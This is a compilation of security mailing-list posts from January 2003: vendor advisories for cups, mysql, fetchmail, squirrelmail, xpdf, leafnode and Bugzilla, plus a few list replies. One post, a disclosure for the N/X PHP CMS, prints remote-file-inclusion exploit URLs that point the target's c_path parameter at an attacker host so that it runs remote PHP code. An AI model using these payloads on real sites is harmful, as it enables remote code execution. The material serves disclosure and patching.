SuSE Security Announcement: cups (SuSE-SA:2003:002)
-BEGIN PGP SIGNED MESSAGE- __ SuSE Security Announcement Package:cups Announcement-ID:SuSE-SA:2003:002 Date: Thursday, Jan 2nd 2003 09:30 MEST Affected products: 7.1, 7.2, 7.3, 8.0, 8.1 SuSE Linux Enterprise Server 8 UnitedLinux 1.0 Vulnerability Type: local and remote privilege escalation Severity (1-10):7 SuSE default package: since 8.1: yes prior 8.1: no Cross References: CAN-2002-1366 CAN-2002-1367 CAN-2002-1368 CAN-2002-1369 CAN-2002-1371 CAN-2002-1372 CAN-2002-1383 CAN-2002-1384 Content of this advisory: 1) security vulnerability resolved: several bugs problem description, discussion, solution and upgrade information 2) pending vulnerabilities, solutions, workarounds: - none 3) standard appendix (further information) __ 1) problem description, brief discussion, solution, upgrade information CUPS is a well known and widely used printing system for unix-like systems. iDFENSE reported several security issues with CUPS that can lead to local and remote root compromise. The following list includes all vulnerabilities: - integer overflow in HTTP interface to gain remote access with CUPS privileges - local file race condition to gain root (bug mentioned above has to be exploited first) - remotely add printers - remote denial-of-service attack due to negative length in memcpy() call - integer overflow in image handling code to gain higher privileges - gain local root due to buffer overflow of 'options' buffer - design problem to gain local root (needs added printer, see above) - wrong handling of zero width images can be abused to gain higher privileges - file descriptor leak and denial-of-service due to missing checks of return values of file/socket operations Since SuSE 8.1 CUPS is the default printing system. As a temporary workaround CUPS can be disabled and an alternative printing system like LPRng can be installed instead. New CUPS packages are available on our FTP servers. Please, install them to fix your system. Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command "rpm -Fhv file.rpm" to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. Intel i386 Platform: SuSE-8.1: ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/cups-1.1.15-69.i586.rpm 2531f8cf2c7ffbc45f5bdabbad31b312 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/cups-1.1.15-69.i586.patch.rpm 048c97ac172f3a838bb3e4789250cd56 ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/cups-libs-1.1.15-69.i586.rpm 3daffc6cac8a067c2a8b52768ada25a0 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/cups-libs-1.1.15-69.i586.patch.rpm 74045133ea1780aa311dab78af0ea7a5 ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/cups-client-1.1.15-69.i586.rpm 593fedd856a9568147f76e70cdd32b94 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/cups-client-1.1.15-69.i586.patch.rpm 9a67ef7fd0162283d662581866a68263 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/cups-1.1.15-69.src.rpm cad9236a0f71d1ad263c4c79e6d4337f SuSE-8.0: ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/cups-1.1.12-90.i386.rpm 9d1d9c3cc395e6355da6f8f1b9ccee5c patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/cups-1.1.12-90.i386.patch.rpm b17bfb78daac61a05c92e938e2d89463 ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/cups-libs-1.1.12-90.i386.rpm 9ec263cb51c223798818509f50246ec9 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/cups-libs-1.1.12-90.i386.patch.rpm a59edfa5ba38116ccd4c264863c4bbf8 ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/cups-client-1.1.12-90.i386.rpm fef9316839a2747111201b5e035295ad patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.0/n2/cups-client-1.1.12-90.i386.patch.rpm 80525203e712a959badab348d07f81a9 source rpm(s): ftp://f
GLSA: leafnode
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - GENTOO LINUX SECURITY ANNOUNCEMENT 200301-2 - - PACKAGE : leafnode SUMMARY : denial of service DATE : 2003-01-02 11:01 UTC EXPLOIT : local and remote - - - From leafnode advisory: "This vulnerability can make leafnode's nntpd server, named leafnode, go into an unterminated loop when a particular article is requested. The connection becomes irresponsive, and the server hogs the CPU. The client will have to terminate the connection and connect again, and may fall prey to the same problem; ultimately, there may be so many leafnode processes hogging the CPU that no serious work is possible any more and the super user has to kill all running leafnode processes." Read the full advisory at http://marc.theaimsgroup.com/?l=bugtraq&m=104127108823436&w=2 SOLUTION It is recommended that all Gentoo Linux users who are running new-news/leafnode-1.9.24 or earlier update their systems as follows: emerge rsync emerge leafnode emerge clean - - [EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+FB2kfT7nyhUpoZMRAuaNAJ0UrCD8EC3dBOO6SSTMC/yDWj1KpACgqNCi I7R5t+COhHyCvR1l3LBg+Zk= =7hvP -END PGP SIGNATURE-
SuSE Security Announcement: mysql (SuSE-SA:2003:003)
-BEGIN PGP SIGNED MESSAGE- __ SuSE Security Announcement Package:mysql Announcement-ID:SuSE-SA:2003:003 Date: Thu Jan 2 15:00:00 MET 2003 Affected products: 7.1, 7.2, 7.3, 8.0, 8.1, SuSE Linux Enterprise Server 7, SuSE Linux Enterprise Server 8, SuSE Linux Connectivity Server, SuSE Linux Office Server, UnitedLinux 1.0 Vulnerability Type: remote command execution Severity (1-10):6 SuSE default package: no Cross References: http://security.e-matters.de/advisories/042002.html Content of this advisory: 1) security vulnerability resolved: Signedness issue and password checking in mysqld, buffer overflow in mysqlclient library. problem description, discussion, solution and upgrade information 2) pending vulnerabilities, solutions, workarounds: grub 3) standard appendix (further information) __ 1) problem description, brief discussion, solution, upgrade information Stefan Esser from e-matters reported various bugs in MySQL. Within the MySQL server the password checking and a signedness issue has been fixed. These could lead to a remote compromise of the system running an unpatched MySQL server. In order to exploit this bug, the remote attacker needs a valid MySQL account. Further, a buffer overflow in the mysqlclient library has been reported and fixed. Applications using this library (as commonly used from within PHP scripts) are vulnerable to this attack and could also be compromised by remote attackers. Since there is no workaround possible except shutting down the MySQL server, we strongly recommend an update. Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command "rpm -Fhv file.rpm" to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. To be sure the update takes effect you have to restart the MySQL server by executing the following command as root: /etc/rc.d/mysql restart If you run applications which utilize the mysqlclient library (i.e. software that accesses a MySQL database server) make sure you restart them again to force the use of the patched libraries. We thank MySQL Product and Release Engineer Lenz Grimmer as well as e-matters Stefan Esser who discovered the bugs for their committment to security matters and the communication of them. i386 Intel Platform: SuSE-8.1: ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mysql-3.23.52-44.i586.rpm 3d6ede325e9abb155ec043c7b3406963 ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mysql-client-3.23.52-44.i586.rpm 7de01d80d0d04ef09c16d490da20eb80 ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mysql-devel-3.23.52-44.i586.rpm 1b04831d6c838ee98ae76626b632640a patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mysql-3.23.52-44.i586.patch.rpm 6e054f2f7a2f698d45424f939031b59f ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mysql-client-3.23.52-44.i586.patch.rpm 4339ae7b1bf4c792529eec784d0dbf9a ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/mysql-devel-3.23.52-44.i586.patch.rpm c797f92a05aff6cf202597e5b132e91a source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/mysql-3.23.52-44.src.rpm d9ee023e43fe6fba95a2d06a74ecc7de SuSE-8.0: ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap2/mysql-3.23.48-78.i386.rpm 690c230feee9f1fe70c1c749a2869002 ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap2/mysql-client-3.23.48-78.i386.rpm c9f595ef30a4b509145343d71e2883a3 ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap3/mysql-devel-3.23.48-78.i386.rpm cebe56578cda9c7e2abf66f37b5f4e92 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap2/mysql-3.23.48-78.i386.patch.rpm a895a353044c5f1e3b3e3ad604154b44 ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap2/mysql-client-3.23.48-78.i386.patch.rpm f25cf16f4137087358fca3afb483a060 ftp://ftp.suse.com/pub/suse/i386/update/8.0/ap3/mysql-devel-3.23.48-78.i386.patch.rpm 51a37bc09a2166985f64dcb3ca32b310 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/mysql-3.23.48-78.src.rpm 8ef39453726a5718dfd04e96d4dda563 SuSE-7.3: ftp://ftp.suse.com/pub/suse
[SECURITY] [DSA 220-1] New squirrelmail packages fix cross site scripting problem
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 220-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze January 2nd, 2003 http://www.debian.org/security/faq - -- Package: squirrelmail Vulnerability : cross site scripting Problem-Type : remote Debian-specific: no CVE Id : CAN-2002-1341 BugTraq Id : 6302 A cross site scripting vulnerability has been discovered in squirrelmail, a feature-rich webmail package written in PHP4. Squirrelmail doesn't sanitize user provided variables in all places, leaving it vulnerable to a cross site scripting attack. For the current stable distribution (woody) this problem has been fixed in version 1.2.6-1.3. The old stable distribution (potato) is not affected since it doesn't contain a squirrelmail package. An updated package for the current unstable distribution (sid) is expected soon. We recommend that you upgrade your squirrelmail package. wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6-1.3.dsc Size/MD5 checksum: 586 235dead908e8caeb873678575c1700c8 http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6-1.3.diff.gz Size/MD5 checksum:15421 414b1afacc8880479f6a41b85cd79a73 http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6.orig.tar.gz Size/MD5 checksum: 1856087 be9e6be1de8d3dd818185d596b41a7f1 Architecture independent components: http://security.debian.org/pool/updates/main/s/squirrelmail/squirrelmail_1.2.6-1.3_all.deb Size/MD5 checksum: 1839686 8daaac2603c171b94bf5def5942f451a These files will probably be moved into the stable distribution on its next revision. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: [EMAIL PROTECTED] Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.7 (GNU/Linux) iD8DBQE+FFTTW5ql+IAeqTIRAiCNAJ9SLmRKDgD/cg1FmehCjg1XYYaLdQCgtJes HzpOTMqmwxejtVwx++hcvhY= =COcy -END PGP SIGNATURE-
GLSA: xpdf
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - GENTOO LINUX SECURITY ANNOUNCEMENT 200301-1 - - PACKAGE : xpdf SUMMARY : integer overflow DATE : 2003-01-02 10:01 UTC EXPLOIT : local and remote - - - From iDEFENSE advisory: "The pdftops filter in the Xpdf and CUPS packages contains an integer overflow that can be exploited to gain the privileges of the target user or in some cases the increased privileges of the 'lp' user if installed setuid. There are multiple ways of exploiting this vulnerability." Read the full advisory at http://www.idefense.com/advisory/12.23.02.txt SOLUTION It is recommended that all Gentoo Linux users who are running app-text/xpdf-1.01-r1 or earlier update their systems as follows: emerge rsync emerge xpdf emerge clean - - [EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+FBHDfT7nyhUpoZMRArLLAJwJ/iqCxaKfUqvTSC6jXFTlwhA25ACfXosJ CM9T0JTkOYDhJIVj7xgZ/5A= =qDHF -END PGP SIGNATURE-
N/X (PHP)
Informations :
°°
Website : http://nxwcms.sourceforge.net/
Version : 2002 PreRelease 1
Problem : Include file
PHP Code/Location :
°°°
nx/common/cds/menu.inc.php :
---
[...]
require_once $c_path."common/lib/launch.inc.php";
[...]
---
nx/common/dbo/datasets.php :
---
require_once $c_path."common/dbo/saveset.php";
require_once $c_path."common/dbo/recordset.php";
require_once $c_path."common/dbo/deleteset.php";
require_once $c_path."common/dbo/updateset.php";
require_once $c_path."common/dbo/insertset.php";
[...]
---
nx/common/lib/mass_opeations.inc.php :
---
require_once $c_path."common/lib/launch.inc.php";
require_once $c_path."common/cds/menu.inc.php";
[...]
---
etc...
Exploits :
°°
http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/ with :
http://[attacker]/common/lib/launch.inc.php
http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/ with :
http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/recordset.php
http://[attacker]/common/dbo/deleteset.php
http://[attacker]/common/dbo/updateset.php
http://[attacker]/common/dbo/insertset.php
etc...
Solution :
°°
Add this line in bugged files :
-
if (!file_exists($c_path."index.php")){ die("Path not found."); }
-
A patch can be found on http://www.phpsecure.org .
More details :
°°
In French :
http://www.frog-man.org/tutos/NX.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FNX.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_
MSN Search, le moteur de recherche qui pense comme vous !
http://search.msn.fr/worldwide.asp
SuSE Security Announcement: fetchmail (SuSE-SA:2003:001)
-BEGIN PGP SIGNED MESSAGE- __ SuSE Security Announcement Package:fetchmail Announcement-ID:SuSE-SA:2003:001 Date: Thursday, Jan 2nd 2003 09:30 MEST Affected products: 7.1, 7.2, 7.3, 8.0, 8.1 SuSE eMail Server 3.1 SuSE eMail Server III SuSE Firewall Adminhost VPN SuSE Linux Admin-CD for Firewall SuSE Firewall on CD 2 - VPN SuSE Firewall on CD 2 SuSE Linux Connectivity Server SuSE Linux Enterprise Server 7 SuSE Linux Enterprise Server 8 SuSE Linux Office Server UnitedLinux 1.0 Vulnerability Type: remote compromise Severity (1-10):4 SuSE default package: yes Cross References: CAN-2002-1365 Content of this advisory: 1) security vulnerability resolved: - heap buffer overflow while expanding email addresses problem description, discussion, solution and upgrade information 2) pending vulnerabilities, solutions, workarounds: - none 3) standard appendix (further information) __ 1) problem description, brief discussion, solution, upgrade information fetchmail is used to download emails from POP-, IMAP-, ETRN- or ODMR- servers. Stefan Esser of e-matters reported a bug in fetchmail's mail address expanding code which can lead to remote system compromise. When fetchmail expands email addresses in mail headers it doesn not allocated enough memory. An attacker can send a malicious formatted mail header to exhaust the memory allocated by fetchmail to overwrite parts of the heap. This can be exploited to execute arbitrary code. There is no temporary fix known. Please install the new packages from our FTP servers. Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command "rpm -Fhv file.rpm" to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. Intel i386 Platform: SuSE-8.1: ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/fetchmail-5.9.13-54.i586.rpm 9a8a8d20e57dd5552fc35c1d17d8f5b2 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/fetchmail-5.9.13-54.i586.patch.rpm 9bfc1e8511d3be0da42cc32b06ffef47 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/fetchmail-5.9.13-54.src.rpm 8e1310dfe46748320b1c92813a1e9294 SuSE-8.0: ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/fetchmail-5.9.0-279.i386.rpm 3be7d683cabd44a5f83b1c0f50a1b1e9 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/fetchmail-5.9.0-279.i386.patch.rpm 38c7c2cca1db2e524b1e4f29ef1e8606 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/fetchmail-5.9.0-279.src.rpm d63b65fa7ddba8f93ffc47fa3fc84fe4 SuSE-7.3: ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/fetchmail-5.9.0-280.i386.rpm 32e4614b5cdf6afea748036e70d80bab source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.3/zq1/fetchmail-5.9.0-280.src.rpm 299b9512dbe87c8e16f14d28288115d3 SuSE-7.2: ftp://ftp.suse.com/pub/suse/i386/update/7.2/n1/fetchmail-5.8.0-78.i386.rpm f3267936cae7fc659007291ac15f42b4 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.2/zq1/fetchmail-5.8.0-78.src.rpm 318d9781b715741cc9d27b102544d30a SuSE-7.1: ftp://ftp.suse.com/pub/suse/i386/update/7.1/n1/fetchmail-5.6.5-40.i386.rpm 311076babc7c2a75b13f24a446327ced source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/fetchmail-5.6.5-40.src.rpm 55c64a56f10aa2904955188b1a40a34a Sparc Platform: SuSE-7.3: ftp://ftp.suse.com/pub/suse/sparc/update/7.3/n1/fetchmail-5.9.0-66.sparc.rpm 5a2abaab7029167944512b8aab306770 source rpm(s): ftp://ftp.suse.com/pub/suse/sparc/update/7.3/zq1/fetchmail-5.9.0-66.src.rpm 95725d5f8aa677641ea1b041222ed8be AXP Alpha Platform: SuSE-7.1: ftp://ftp.suse.com/pub/suse/axp/update/7.1/n1/fetchmail-5.6.5-30.alpha.rpm ad4833f9e2a4e6bf31336f2dc363d3e1 source rpm(s): ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/fetchmail-5.6.5-30.src.rpm ac786b49dcbf71357b4894c0b4fd4b55 PPC Power PC Platform: SuSE-7.
Re: Filtering devices spotting
In some mail from Ed3f, sie said: > > > SECURITY ALERT > > > Systems Affected > > 100% of packet filtering systems included commercial > embedded devices > (no unaffected system known at the moment) Well, not quite 100%... You have been able to filter on bad TCP checksums in IPFilter for some time - see this email message from me to the ipfilter list some 4 months ago: http://false.net/ipfilter/2002_08/0250.html I'm trying to get other things done and fixed before saying "4.0 is no longer alpha". Darren
Re: Potential disclosure of sensitive information in Netscape 7.0 email client
Hello Michael, Wednesday, January 1, 2003, 12:19:49 PM, you wrote: MP> Netscape 7.0 includes, as part of it's release, an email client, capable of MP> handling POP3 and IMAP accounts. The method that the email client utilizes MP> to permanently delete email messages is not explained, which could lead to MP> users having large quantities of email messages, which they would think of MP> as permanently deleted, still stored in clear text on their hard disks. The same applies to Ritlab's The Bat! (up to version 1.60c i'm currently using). The Bat! stores all of the messages in $thebathome\mail\$accountname\$foldername\Messages.tbb and status information in Messages.tbi (without customization and message filtering all mail goes to $foldername named inbox). All messages remain there until Folder|Compress function is used. The question is - is that a feature or a bug? I'm using The Bat! for nearly three years now and it's there from where I can remember (although there were dozen or so version changes). -- Best regards, Bartek Raszczyk mailto:[EMAIL PROTECTED]
[BUGZILLA] Security Advisory - remote database password disclosure
Bugzilla Security Advisory January 2nd, 2002 Severity: major (remote database password disclosure, bug 186383) minor (local file permissions, bug 183188) Summary === All Bugzilla installations are advised to upgrade to the latest versions of Bugzilla, 2.14.5 and 2.16.2, both released today. Security issues of varying importance have been fixed in both branches. These vulnerabilities affect all previous 2.14 and 2.16 releases. Development snapshots prior to version 2.17.3 are also affected, so if you are using a development snapshot, you should obtain a newer one or use CVS to update. 2.14.x users are additionally encouraged to upgrade to 2.16.2 as soon as possible, as this is the last 2.14.x release and the 2.14 branch will no longer be supported by the Bugzilla team. This advisory covers two security bugs: one involves incorrect local permissions on a directory, allowing local users access. The other involves protecting configuration information leaks due to backup files created by editors. Vulnerability Details = The following security issues were fixed in 2.14.5, 2.16.2, and 2.17.3: - The provided data collection script intended to be run as a nightly cron job changes the permissions of the data/mining directory to be world- writable every time it runs. This would enable local users to alter or delete the collected data. (Bugzilla bug 183188 / Bugtraq ID 6502). - The default .htaccess scripts provided by checksetup.pl do not block access to backups of the localconfig file that might be created by editors such as vi or emacs (typically these will have a .swp or ~ suffix). This allows an end user to download one of the backup copies and potentially obtain your database password. If you already have such an editor backup in your bugzilla directory it would be advisable to change your database password in addition to upgrading. In addition, we also continue to recommend hardening access to the Bugzilla database user account by limiting access to the account to the machine Bugzilla is served from (typically localhost); consult the MySQL documentation for more information on how to accomplish this. (Bugzilla bug 186383 / Bugtraq ID 6501) Also included in these releases are the patches that were posted as part of our earlier security advisory on November 26th, 2002. (Bugzilla bug 179329, Bugtraq ID 6257 - see http://online.securityfocus.com/archive/1/301316 ) Vulnerability Solutions === The fixes for both security bugs contained in this release, as well as the previously announced security bug involving cross-site scripting vulnerabilities are contained in the 2.14.5, 2.16.2, and 2.17.3 releases. Upgrading to these releases will protect installations against exploitations of these security bugs. Individual patches to upgrade Bugzilla are available at: http://ftp.mozilla.org/pub/webtools/ (these patches are only valid for 2.14.4 and 2.16.1 users). Full release downloads and CVS upgrade instructions are available at: http://www.bugzilla.org/download.html References == Complete bug reports for the security bugs covered herein may be obtained at: http://bugzilla.mozilla.org/show_bug.cgi?id=183188 http://bugzilla.mozilla.org/show_bug.cgi?id=186383 General information about the Bugzilla bug-tracking system can be found at http://www.bugzilla.org/ Comments and follow-ups can be directed to the netscape.public.mozilla.webtools newsgroup or the mozilla-webtools mailing list; http://www.mozilla.org/community.html has directions for accessing these forums. -30- -- Dave Miller Project Leader, Bugzilla Bug Tracking System http://www.justdave.net/ http://www.bugzilla.org/
Re: Potential disclosure of sensitive information in Netscape 7.0 email client
I noticed this a while ago with netscape 4.x and those versions are still vulnerable as well. I've never checked 6.x. -BludClot -- Get your own Hello Kitty email @ www.sanriotown.com Powered by Outblaze
